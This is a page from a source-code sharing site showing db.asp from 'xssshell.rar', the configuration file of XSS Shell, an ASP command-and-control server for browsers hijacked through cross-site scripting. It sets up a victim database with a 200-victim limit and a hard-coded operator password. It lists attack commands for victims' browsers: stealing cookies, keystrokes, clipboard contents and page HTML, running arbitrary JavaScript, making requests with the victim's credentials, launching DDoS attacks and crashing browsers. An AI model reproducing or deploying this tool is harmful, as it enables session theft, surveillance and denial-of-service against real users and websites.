开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
db.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:3k
源码类别:

破解

开发平台:

ASP/ASPX

db.asp:源码内容
  1. <%
  2. '// By Ferruh Mavituna | http://ferruh.mavituna.com
  4. ' 09/08/2006
  5. ' - Started
  6. '
  7. ' 30/10/2006
  8. ' - DBNAME changed with DBPATH
  9. '
  10. '31/10/2006
  11. ' - Password protection added
  12. Option Explicit
  14. '60 minutes
  15. Session.Timeout = 60
  17. 'Open In Live Enviroments
  18. 'On error resume next
  20. '// DATABASE CONFIGURATION
  21. Const DBPATH = "..dbshell.mdb"
  24. 'Activity check time as seconds
  25. Const Activity = "10"
  28. Const SQLSERVER = False
  30. Const XMLHTTP = 0
  31. Const IFRAME = 1
  32. Const IMG = 2
  33. Const JSMODEL = 3
  35. Dim COMMUNICATIONCHANNEL
  36. COMMUNICATIONCHANNEL = JSMODEL
  38. 'Application Version
  39. Const APPVER = "0.3.8"
  41. 'Default Records Count to show
  42. Const DEFAULT_REC = 10
  43. Const MAX_COMMAND = 5
  44. Const MAX_VICTIM = 200
  46. ' Data Seperator
  47. Const DATA_SEPERATOR = "|.|"
  49. 'Determine to accept every request or only valid Attack IDs (expected IDs)
  50. Dim ACCEPT_EVERY_REQUEST 
  51. ACCEPT_EVERY_REQUEST = False
  53. 'Broadcast attacks Always accept
  54. Const BROADCAST_ATTACK = 336699
  56. '// Constants for JS Connector implementation
  57. Const HTMLPAGE = 1
  58. Const TEXT = 2
  59. Const COMMAND_SEPERATOR = "{|}"
  62. Dim Commands
  64. 'var CMD_GETCOOKIE = 1;
  65. 'var CMD_GETSELFHTML = 2 ;
  66. 'var CMD_ALERT = 3;
  67. 'var CMD_YESNO = 4;
  68. 'var CMD_EVAL = 5;
  70. ' Avaliable Commands
  71. Commands = Array("getCookie()",1,"Get victims active cookie", "getSelfHtml()",2,"Get victim's current page HTML Code", "alert(<message>)",3,"Send message to victim", "eval(<javascript code>)",5,"Execute virtually anything in JS","prompt(<question>)",4,"Play Truth or Dare","getKeyloggerData()",6,"Get keylogger data", "getMouseLog()", 7, "Get mouse log (every click in screen)", "getClipboard()", 8, "Get clipboard data (only IE)", "getInternalIP()", 9, "Get internal IP address (only Mozilla* + JVM)", "checkVisitedLinks(<url list>)",11,"Check victim's history (seperated by new line)", "getPage(<Relative URL Path>)",12,"Make a request with victim credentials", "DDoS(<url>)", 13, "Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)", "Crash()", 14, "Consume victim's CPU and force to crash/close.") 
  73. 'Hidden command STOPDOS = 15
  75. '// Error Codes
  76. Const NO_RECORD = 0
  77. Const FAILED = 0
  78. Const SUCCESS = 1
  79. Const NON_ERROR = 2
  81. 'Global
  82. Dim Title
  84. '// DB Connection
  85. Dim fmconn, fmconnexe, fmconnpath
  86. fmconnpath = Server.MapPath(DBPATH) 
  87. 'Response.Write fmconnpath : Response.End
  89. If SQLSERVER Then
  90. fmconn = "Provider=sqloledb;" & _
  91.    "Data Source=" & SQLIP & ";" & _
  92.    "Initial Catalog=***;" & _
  93. "User ID=***;" & _
  94. "Password=***"
  95. fmconnexe = fmconn
  97. Else '// Access
  98. fmconn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & fmconnpath
  99. fmconnexe = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & fmconnpath
  101. End If
  104. '// Password protected pages
  105. Sub protected()
  107. Dim ThisPage
  108. ThisPage = Server.HtmlEncode(Request.ServerVariables("SCRIPT_NAME"))
  110. '// Set Session + password is Case Sensitive
  111. If Request.Form("pass") <> "" Then
  112. If Trim(Request.Form("pass")) = "w00t" Then Session("level") = "ok"
  113. Response.Redirect "?"
  114. End If
  116. '// Logout (xxx.asp?logout=ok)
  117. If Request.Querystring("logout") <> "" Then Session("level") = ""
  119. '// Ask for Login
  120. If Session("level") <> "ok" Then
  121. Response.Write "<form method=""post"" action=""" & ThisPage & """><input type=""password"" name=""pass"" /><input type=""submit"" value=""Login""/></form>"
  122. Response.End
  123. End If
  125. End Sub
  127. '// Include Library
  128. %>
  129. <!--#include file="fmlibrary/fmlibraryv3.asp" -->